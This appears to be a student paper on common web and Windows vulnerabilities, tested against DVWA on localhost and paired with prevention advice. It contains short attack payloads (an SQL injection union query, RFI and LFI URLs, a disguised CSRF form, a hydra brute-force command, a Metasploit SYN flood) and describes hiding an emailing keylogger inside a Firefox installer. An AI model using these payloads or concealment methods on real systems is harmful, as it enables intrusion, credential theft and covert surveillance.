Abstract— In order to be able to make an analysis related to vulnerabilities applicable to websites and Microsoft Windows operating systems it was needed to install Kali Linux on a virtual machine to be able to use Metasploit Framework and Burp Suite to start penetesting websites using vulnerabilities that are the most common.Vulnerabilities that are analysed here are: SQL Injection,Cross Site Scripting,Remote File Inclusion,Local File Inclusion, Cross-Site Request Forgery,File Upload,Brute Force, DDoS. In the second part Microsoft Visual Studio was needed to develop a keylogger that was added to Microsoft Windows Vulnerabilities in order to exploit them.Also here is presented methods to protect against these vulnerabilities and how to fix them.
Keywords—vulnerabilities analysis; web vulnerabilities; windows os vulnerabilities; Metasploit penetesting; kali linux penetesting; sql injection penetesting; keylogger exe
I. INTRODUCTION
In computer security, a vulnerability is a weakness which can be exploited by a Threat Actor, such as an attacker, to perform unauthorized actions within a computer system. To exploit a vulnerability, an attacker must have at least one applicable tool or technique that can connect to a system weakness. In this frame, vulnerability is also known as the attack surface.
Vulnerability management is the cyclical practice of identifying, classifying, remediating, and mitigating vulnerabilities. This practice generally refers to software vulnerabilities in computing systems.
A security risk is often incorrectly classified as a vulnerability. The use of vulnerability with the same meaning of risk can lead to confusion. The risk is the potential of a significant impact resulting from the exploit of a vulnerability. Then there are vulnerabilities without risk: for example when the affected asset has no value. A vulnerability with one or more known instances of working and fully implemented attacks is classified as an exploitable vulnerability—a vulnerability for which an exploit exists. The window of vulnerability is the time from when the security hole was introduced or manifested in deployed software, to when access was removed, a security fix was available/deployed, or the attacker was disabled—see zero-day attack.
Security bug (security defect) is a narrower concept: there are vulnerabilities that are not related to software: hardware, site, personnel vulnerabilities are examples of vulnerabilities that are not software security bugs.[1]
In computers and computer networks an attack is any attempt to expose, alter, disable, destroy, steal or gain unauthorized access to or make unauthorized use of an Asset. A cyberattack is any type of offensive maneuver that targets computer information systems, infrastructures, computer networks, or personal computer devices.
A cyberattack may steal, alter, or destroy a specified target by hacking into a susceptible system. Cyberattacks can range from installing spyware on a personal computer to attempting to destroy the infrastructure of entire nations. Legal experts are seeking to limit the use of the term to incidents causing physical damage, distinguishing it from the more routine data breaches and broader hacking activities.[2]
This paper is structures as it follows : Section II provides theoretical fundamentals about vulnerabilities are that are analysed .Section III presents methods to provent and fix these vulnerabilities plus implementation of the attacks.The results and practical implementation of vulnerabilities are presented in Section IV. The final section provides the conclusions.
II. THEORETICAL FUNDAMENTALS ON VULNERABILITIES
• SQL Injection:
SQL Injection Vulnerability occurs when an attacker can insert any data into an SQL query or when with syntax injection, the logic of the statement, is modified to execute a different action. SQL injection can be crucial to the system but, despite the danger it represents, is one of the most common vulnerabilities.
• Cross Site Scripting:
Cross Site Scripting (XSS) is a web vulnerability that allows the attacker to introduce a malicious code into a web page. This code can affect other users who view the infected page, which shows that this vulnerability is client-side. This vulnerability is dangerous only when the code is used to steal “cookies” or user sessions.
• Remote File Inclusion:
Remote File Inclusion is a vulnerability that uses include functions from server-side programming languages like php to execute code from a remote file stored in a different server. Attackers host malicious files and then take advantage of inappropriate sanitization of user input in order to modify or inject a include function in the PHP code the victim’s site.
• Local File Inclusion:
Local File Inclusion can occur when the user input is able to modify the complete or absolute path of the files included on the server. Attackers can use this vector to retrieve access, read, or write from sensitive local files such as configuration files containing database credentials.
• Cross-Site Request Forgery:
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. CSRF attacks specifically target state-changing requests like transferring funds, changing their email address, and so forth,
not theft of data, since the attacker has no way to see the response to the forged request.[7]
• File Upload:
File Upload is a type of vulnerability which occurs in web applications if the file type uploaded is not checked, filtered or sanitized.The main danger of this is that the attacker can upload a malicious PHP script and execute it. The main idea is to get the access to the server and execute desired code. for example an attacker who have gained access to such kind of vulnerability can upload a malicious shell script and further can control the machine to execute desired commands, which would lead to a full compromise of the server and of the site.
• Brute Force Attack:
Brute-Force attack appears when an attacker uses a set of predefined values to attack a target and analyze the response until he succeeds. The most common and easiest to understand example of the brute-force attack is the dictionary attack to crack the password. In this, attacker uses a password dictionary that contains millions of words that can be used as a password.
• DDOS:
A Distributed Denial-Of-Service (DDoS) attack is a malicious attempt to disrupt normal traffic of a targeted server, service or network by overwhelming the target or its surrounding infrastructure with a flood of Internet traffic. DDoS attacks achieve effectiveness by utilizing multiple compromised computer systems as sources of attack traffic.[8]
• Keylogger:
Keylogger is a software that has the purpose of recording (logging) the keys struck on a keyboard, typically covertly, so that the person using the keyboard is unaware that their actions are being monitored. Data can then be retrieved by the person operating the logging program. A keylogger can be either software or hardware.
• File Binder:
A File Binder is a program that can bundle files of multiple types together and allow them all to execute when the user opens the bound module. This can have entirely innocent or more malicious applications. One reason to use a file binder is to hide files. This can be a security measure in some settings, and in other cases, it can have malicious applications.
• File Extension Spoofing:
A Spoofing Attack is a situation in which a person or program successfully masquerades as another by falsifying data, to gain an illegitimate advantage. File Extension Spoofing is a method by which attackers modify extension of malicious executable files and make them appear to be other types of files, for example, an executable file can be made to look like a .pdf file or an image without the victim realizing that he was running an infected executable.
III. IMPLEMENTATION AND PREVENTING VULNERABILITIES
• SQL Injection:
In order for an SQL Injection attack to take place,the vulnerable website needs to directly include user input within an SQL statement. An attacker can then insert a payload that will be included as part of the SQL query and run against the database server.A simple example of an SQL Injection payload could be something as simple as setting the password field to password’ OR 1=1.
This would result in the following SQL query being run against the database server.
SELECT id FROM users WHERE username=’username’ AND password=’password’ OR 1=1’
An attacker can also comment out the rest of the SQL statement to control the execution of the SQL query further. The result of this operation is a list of all records that satisfy expression, which is a user’s database entry.
Methods to prevent SQL Injection
There are specific measures that can be taken within the database and the application layer.
• Using well-defined variables and database column definitions
• Assign query results to a well-defined variable
• Data length limitation
• Avoid creating queries by concatenating strings:
• Applying data separation and role-based access within the database [3]
• Cross Site Scripting:
In this vulnerability The attacker injects a payload in the website’s database by submitting a vulnerable form with some malicious JavaScript.The victim requests the web page from the website.The website serves the victim’s browser the page with the attacker’s payload as part of the HTML body.The victim’s browser will execute the malicious script inside the HTML body. In this case it would send the victim’s cookie to the attacker’s server. The attacker now simply needs to extract the victim’s cookie when the HTTP request arrives to the server, after which the attacker can use the victim’s stolen cookie for impersonation.
XSS is classified in two categories: Stored and Reflected. Stored XSS is saved in the website’s database and the other one affects the user only if he access the malicious page link.
This vulnerability can be repaired easily because the PHP programming language provides two functions htmlentities and htmlspecialchars that converts the special characters “<“, “>”, “&” and quotation marks into HTML entities so the web browser will return the text but will not execute the code maliciously introduced by the attacker.[4]
• Remote File Inclusion:
To test this vulnerability let’s assume we have found a vulnerable website
http://sitevulnerable/index.php?page=home
As you can see, this website pulls documents stored in text format from server and renders them as web pages. We can find ways around it as it uses PHP include function to
pull them out. We will modify from the parameter page adding the path to our site where we have stored the malicious script.
http://vulnerablewebsite/index.php?page=http://attackersite/scriptmalicious.txt
If the malicious code is executed correctly the attacker can modify,remove,read files from site’s hosting provider and the website is compromised.
In order to avoid this vulnerability should be done three important things in structure of the site:
• Do not use arbitrary input data in the request to include a file.
• Use a filter to clean the input parameters against possible file entries
• Build a dynamic white list.[9]
• Local File Inclusion:
In order test this vulnerability let’s say that I have a site that displays a page page=contact.php which I will modify the link with the path of a sensitive file url/index.php?page=etc/passwd which will display the content.By this you can see user’s password if the site is hosted in Unix or you can see sensitive Windows files such as boot.ini.
This vulnerability can be avoided just like RFI, using a switch for pages that can be included, and filtering the “../” or “.. \” strings.[9]
• Cross-Site Request Forgery:
In a CSRF the attacker exploits the vulnerability by sending the victim by a specific method the link containing the fake request and the victim access the link by which the request in the code made by attacker is validated by the server without the user knowing that in this case the transfer of an amount of money from the user’s account to another account set by the attacker.
An attack CSRF can generally be recognized through links in comments that send us for example to the administration panel, or image tags like:
<img src=”http://mysite/privatepage?privateaction”/> .
Methods to prevent CSRF:
To prevent this vulnerability, you must take some control measures in the web application that are:
• Transmitting information through POST
• HTTP_REFERER verification
• Adding captcha verification and implementing of unpredictable token.[7]
• File Upload:
To implement this vulnerability on a file upload site we have to upload a php malicious file.This file can be uploaded to that site by tricking it with multiple methods like trying to upload the file with some lost extensions that can be dangerous on server side or we can find server configuration flaws by providing a sensitive extension after a delimiter eg “/file.jpg/index.php”. Also by bypassing content-type header verification by changing this parameter in the request header using a web proxy.If the attacker succeed to upload the php malicious file he can modify,delete, configuration files making the site compromised.
Methods to avoit File Upload Vulnerability
In order to avoid this vulnerability you must do the following things:
• Validation of file format and extension with white list and black list
• Sanitization of the files,use a virus scanner,check file size,add compression methods
• Save files outside the root,in a non public folder[5]
• Brute Force Attack:
Brute Force attacks are difficult, if not impossible, to carry out manually. Instead, hackers write simple scripts, called bots, that carry out thousands of these break-in attempts against websites on auto-pilot. Typically, these bots are custom-written by the attackers and designed to be easily distributed across many hacked machines. These groups of bots, or botnets, work in conjunction with other commonly accessible tools that either generate thousands of passwords or use a wordlist. Brute Force attacks on a site can continue indefinitely, until the bot either discovers a username/password combination that will let the attacker into the back end of your website, or the bot runs out of passwords to check. [6]
To prevent password cracking by using a Brute-Force attack, one should always use long and complex passwords. This makes it hard for attacker to guess the password, and brute-force attacks will take too much time.
• DDOS:
Once the attacker has a large number of botnets and launches the attack on a site, the site begins to start running very slow, it loads the pages hard then then it becomes unavailable, the server crashing. While nearly all DDOS attacks involve overwhelming a target device or network with traffic, attacks can be divided into three categories: application, protocol and volumetric attacks.. An attacker may make use one or multiple different attack vectors, or cycle attack vectors potentially based on counter measures taken by the target.[8]
In order to stop this kind of attack the biggest problem is to separate the bad traffic from normal traffic which are users. There are services online for this attack like cloudflare but if the attack is very powerful with a large bandwidth the web administrator cannot do anything until the attacker stops the attack.
• Keylogger:
This keylogger is developed in Microsoft Visual Studio and has a structure with 5 methods and 1 object.
• The object is a string path that calls the Environment.GetFolderPath method and returns the location where the log file is saved
• The first method is GetAsyncKeyState and determine when a key is pressed or not.
• The second method is Main and in the block of the method called the Start method in the Program class.
• The third method is the start that starts the program process.
• The fourth method is verifyKey which checks which key has been pressed.
• The fifth method is sendEmail that sends the logs on the set email.
In order to avoid infection with keyloggers you must use an anti-keylogger software or an antivirus.Furthermore you muse keep your operating system updated and use operating system preinstalled firewall.
• File Binder:
To protect against file binders it it pretty hard because you cannot start from the beginning of starting a executable file what does it contains but you can check file manager after you have installed that executable to see if there are suspicious programs running.
• File Extension Spoofing:
To avoid this kind of vulnerability you must keep your antivirus updated because if the file is a virus it will be detected. Furthermore you must take care of the files you download from the internet and it is recommended to download from official servers and from trusted websites.
IV. RESULTS AND PRACTICAL IMPLEMENTATION
• SQL Injection:
I have tested SQLi Vulnerability on DVWA on a form where you can search names in database.After exploiting this vulnerability and finding out that the table users contains user names and password I will paste this code to that search form : 1′ and 1=1 union select user, password from users# which will return me the users and their password in md5 hash.I’ve cracked MD5 Hash from admin and i got admin’s password
Fig. 1. Username and password as hash from database
Fig. 2. Password decrypted from Hash
• Cross Site Scripting
I tested this vulnerability on a page that has a sign guestbook and I managed to execute JavaScript code to steal cookies from users that access that page by adding this code into message box.<script>alert(document.cookie)</script>
After stealing the cookie I can use it to log in on their accounts with their cookies using Tamper Data. You can see that I managed to implement a reflected XSS on a page and steal user’s cookies.
Fig. 3. Cookie from Reflected Cross Site Scripting
Fig. 4. Cookie from Stored Cross Site Scripting
• Remote File Inclusion:
In order to test this vulnerability I uploaded a malicious PHP script called ShellC99 on a different host to execute different operations on vulnerabile site.
Fig. 5. Remote File Inclusion Vulnerability Exploited
• Local File Inclusion:
On this vulnerability I’ve modified on a page the parameter page=include.php where it’s the location storage to page=/etc/passwd. As you can see on figure 5 i’ve listed the whole passwd file from nix with usernames on it.
Fig. 6. Local File Inclusion Vulnerability Exploited and displaying Linux System Files
• Cross-Site Request Forgery
I tested this vulnerability on a password changing form. I modified from source page the form by adding to the input form from password a value in my case : value=”test123″> and i saved the password changing form to a new html file.I also modiffied it to something else in my case a page that says boost your computer. When accessing the html file and clicking the button the password automatically changed without letting the victim know.
The code that modify the password is :
<form action=” http://localhost/dvwa/vulnerabilities/csrf/?” method=”GET”>Click here to boost computer performance!<br />
<input type=”hidden” AUTOCOMPLETE=”off” name=”password_new” value=”test123″>
<input type=”hidden” AUTOCOMPLETE=”off” name=”password_conf” value=”test123″>
<input type=”submit” value=”Boost PC” name=”Change”>
</form>
After the button from HTML Code is pressed the password will automatically change with the one that is typed in code.
Fig. 7. Cross Site Request Forgery Vulnerability Exploited by changing user password
• File Upload
I will try to upload a PHP file on a image hosting site. In order to trick the site that my php file is an image I have to intercept the traffic with burp suite and modify the request by changing the content type to image/jpg. By doing this the website will upload the php file considering that it is an image.
Fig. 8. File Upload Vulnerability Exploited by uploading a Shell that was masked in a jpg file
• Brute Force Attack
In order to do a Brute Force attack I will use Kali Linux and its password list from john software.For this I will need user cookie and session ID that I will get with Burp Suite.The code that will brute force DVWA page is:
hydra 127.0.0.1 -l admin -P /usr/share/john/password.lst http-get-form “/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H-Cookie: security=low; PHPSESSID=0h6htvhn74l1bp5oj41n3j9dhg”
Fig. 9. Representation of a brute force attack using Kali Linux
• DDOS:
In order to do a DDOS attack I will use Metasploit framework from Kali Linux to SYN Flood my router IP. I will start Metasploit by typing msfconsole in terminal then this command use auxiliary/dos/tcp/synflood .After that I will put the parameters for the attack and type exploit after
set RHOST 192.168.1.254
set RPORT 8899
Fig. 10. Representation of a DDOS Atack using Metasploit Framework from Kali Linux
• Keylogger:
This Keylogger made in C# saves what you type on keyboard and saves everything on a hidden file called log.txt saved in user folder. It has a feature that sends to a set email logs from computer every 2 minutes.
Fig. 11. Screenshot of an email send by the keylogger
• File Binder:
In order to use this exploit I have downloaded a File Binder from internet and merged two executable files,in my case Firefox installer and Keylogger. By binding these two files the victim will launch the Firefox installer and automatically the Keylogger will launch in background without alerting or showing something to victim.Also I have changed the icon from output binded file to Firefox icon exactly like the installer so I can say that I hide the Keylogger in Firefox installer theoretically.
Fig. 12. Keylogger binded with Mozilla Firefox Installer
• File Extension Spoofing:
In order to test this vulnerability I have downloaded Winrar 4.2 which is vulnerable to file extension spoofing. I have archived .zip the Keylogger and opened the archive with a Hex editor. I searched in the Hex editor after executable from archive I found 2 results : one at the beginning and one at the end. By modifying the extension of the executable from the end let’s say .jpg and saving the archive Winrar will open it and see it as a image file. So if you double click the image from Winrar archive it will launch as a executable file as it was before.
Fig. 13. Keylogger exe extension spoofed with a jpg file
V. CONCLUSION
This paper presents a study on web vulnerabilities and Microsoft Windows .Are presented in detail the main web vulnerabilities that are most widespread, then explained methods to protect against them and on the experimental results part the vulnerabilities are exploited on a web application called DVWA(Damn Vulnerable Web App) hosted on a Apache server in localhost.
In the second part was created a keylogger in C# that allowsyou to monitor keyboard and send logs to a set email at a time of 2 minutes. At the same time there is a brief presentation of some Windows vulnerabilities through which you can spread the keylogger created and exploitation of the presented vulnerabilities in Windows 8.
REFERENCES
[1] Foreman, P: Vulnerability Management, page 1. Taylor & Francis Group, 2010. [2] W., Lin, Tom C. (14 April 2016). ‘Financial weapon war” ssm.com
[3] Acunetix.com Web Security SQL Injection
[4] Acunetix.com Web Security Cross Site Scripting
[5] Improve File Uploaders’ Protections – Bypass Methods- Rev. 1.0
[6] WordFence Brute Force attacks Introduction
[7] Cross-Site_Request_Forgery CSRF Owasp
[8] CloudFlare What-is-a-DDOS Attack
[9] How to prevent Remote file inclusion (RFI) attacks EasySecurityPlanet